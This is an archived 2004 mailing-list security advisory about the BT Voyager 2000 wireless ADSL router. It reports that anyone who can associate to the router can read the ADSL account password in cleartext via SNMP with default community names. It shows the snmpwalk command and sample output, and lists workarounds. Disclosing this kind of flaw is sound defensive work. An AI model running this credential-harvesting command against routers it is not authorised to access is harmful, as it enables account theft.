Wireless Modem (BT Voyager 2000 Wireless ADSL Router cleartext password)

To: bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxx
Subject: Wireless Modem (BT Voyager 2000 Wireless ADSL Router cleartext password)
From: "Konstantin V. Gavrilenko" <mlists@xxxxxxxxxx>
Date: Tue, 22 Jun 2004 07:47:21 +0100
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Organization: Arhont Ltd. - Information Security
Reply-to: k.gavrilenko@xxxxxxxxxx
User-agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040620

Arhont Ltd. - Information Security

Arhont Advisory by:     Konstantin Gavrilenko (http://www.arhont.com)
Advisory:               cleartext account password obtainable using SNMP
Class:                  design/configuration bug
Test platform:          BT Voyager 2000 Wireless ADSL Router
Vendor Contact Date:    10/06/2004
PD* release date:       22/06/2004


DETAILS:

It is possible to obtain the ADSL account password from the wireless
side of the mentioned router. Provided the attacker can associate to the
router, he/she can grab SNMP strings from the router using default
public/private community name.

Furthermore, the information provided with public and private community
name are identical, differing only in that with private you can
obviously change the SNMP strings.



e.g.
root@abyrvalg:~# snmpwalk -v 1 -c public 192.168.1.1
SNMPv2-MIB::sysDescr.0 = STRING: BT Voyager 2000 Wireless ADSL Router
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.2535.111.6
SNMPv2-MIB::sysUpTime.0 = Timeticks: (260430184) 30 days, 1:02:01.84
[snip]
SNMPv2-SMI::transmission.23.2.3.1.5.5.1 = STRING:
"name.surname@xxxxxxxxxxxxxxx"
SNMPv2-SMI::transmission.23.2.3.1.5.6.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.7.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.8.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.9.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.10.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.11.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.12.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.2 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.3 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.4 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.5 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.6 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.7 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.8 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.5.1 = STRING: "password"
[snip]



Risk Factor: High/Medium

Workarounds:
- Disallow anonymous access to the wireless router
- Change default SNMP community names
- Disable SNMP support



*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer 7 days before
releasing them to the public domains (such as CERT, BUGTRAQ, OSVDB).

If you would like to get more information about this issue, please do
not hesitate to contact Arhont team.




--
Respectfully,
Konstantin V. Gavrilenko

Arhont Ltd - Information Security

web:    http://www.arhont.com
        http://www.wi-foo.com
e-mail: k.gavrilenko@xxxxxxxxxx

tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141

PGP: Key ID - 0x4F3608F7
PGP: Server - keyserver.pgp.com

Prev by Date: linux kernel IEEE1394(Firewire) driver integer overflow vulnerabilities
Next by Date: [SECURITY] [DSA 522-1] New super packages fix format string vulnerability
Previous by thread: linux kernel IEEE1394(Firewire) driver integer overflow vulnerabilities
Next by thread: [SECURITY] [DSA 522-1] New super packages fix format string vulnerability
Index(es):
- Date
- Thread